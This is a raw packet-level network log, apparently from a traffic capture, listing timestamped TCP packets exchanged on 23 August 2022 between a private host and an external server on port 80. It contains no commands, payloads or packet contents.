Aug 23, 2022 03:43:00.824788094 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.824805021 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.824807882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824831963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824836016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.824856997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824861050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.824882030 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824894905 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.824908972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824932098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824956894 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824982882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.824997902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.825009108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.825011015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.825018883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.825035095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.825054884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.825061083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.825072050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.825088978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.825109959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.825151920 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.833580017 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.835263014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.841314077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.841437101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.872740030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.873327971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.910581112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910650969 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910693884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910732985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910753012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.910773039 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910788059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.910815001 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910823107 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.910856962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910898924 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910922050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.910939932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.910983086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911005974 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911067009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911077023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911118984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911154032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911163092 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911187887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911206007 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911242008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911247015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911277056 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911286116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911314964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911393881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911421061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911437035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911458969 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911475897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911516905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911531925 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911541939 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911561966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911588907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911601067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911640882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911655903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911679983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911703110 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911720037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911761045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911777020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911801100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911842108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911868095 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911885977 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911897898 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911925077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.911938906 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.911967993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912005901 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912008047 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912019968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912048101 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912065029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912087917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912105083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912127972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912142038 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912169933 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912199020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912209988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912250042 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912255049 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912267923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912290096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912312984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912331104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912343025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912370920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912412882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912435055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912451029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912492990 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912533045 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912540913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912554026 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912558079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912579060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912591934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912620068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912622929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912661076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912702084 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912713051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912743092 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912781000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912791014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912822962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912863970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912874937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.912904024 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912944078 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.912983894 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913022041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913023949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913054943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913063049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913074017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913103104 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913104057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913145065 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913177013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913187027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913188934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913227081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913266897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913283110 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913306952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913319111 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913347960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913352013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913388968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913397074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913429022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913434982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913470984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913511992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913523912 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913554907 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913559914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913595915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913602114 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913635969 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913674116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913690090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913713932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913714886 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913754940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913764954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913794994 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913836956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913845062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913875103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913914919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.913930893 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.913966894 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914005995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914015055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914047956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914088964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914093018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914128065 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914167881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914207935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914216042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914249897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914257050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914292097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914330959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914334059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914370060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914410114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914414883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914448023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914489031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914493084 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914530993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914556026 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914572954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914614916 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914623976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914654970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914659977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914696932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914737940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914742947 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914777994 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914817095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914820910 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914859056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914900064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914905071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.914942980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914980888 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.914990902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915020943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915061951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915076971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915101051 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915139914 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915153027 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915179968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915220976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915235043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915261984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915301085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915313959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915342093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915391922 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915402889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915442944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915482998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915517092 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915524006 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915533066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915565014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915568113 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915606022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915611982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915654898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915693998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915707111 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915734053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915740013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915774107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915777922 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915813923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915821075 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915854931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915862083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915894032 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915934086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.915947914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.915973902 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916013956 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916027069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916053057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916091919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916101933 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916134119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916176081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916187048 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916214943 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916254997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916261911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916295052 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916333914 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916346073 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916373014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916373968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916414022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916454077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916461945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916496038 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916534901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916542053 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916575909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916615963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916621923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916652918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916692019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916701078 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916731119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916771889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916780949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916814089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916851997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916862965 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916893005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916932106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.916941881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.916970968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917011023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917042017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917049885 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917082071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917090893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917109013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917133093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917151928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917171955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917212963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917226076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917252064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917283058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917290926 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917293072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917331934 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917337894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917371988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917412996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917418957 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917443037 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917453051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917454958 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917493105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917522907 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917541027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917545080 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917581081 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917587996 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917618990 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917638063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917659044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917699099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917706966 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917738914 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917776108 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917781115 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917784929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917819023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917828083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917860985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917901993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917912006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.917941093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917980909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:00.917995930 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:00.918020964 CEST	80	49812	135.181.104.248	192.168.2.3
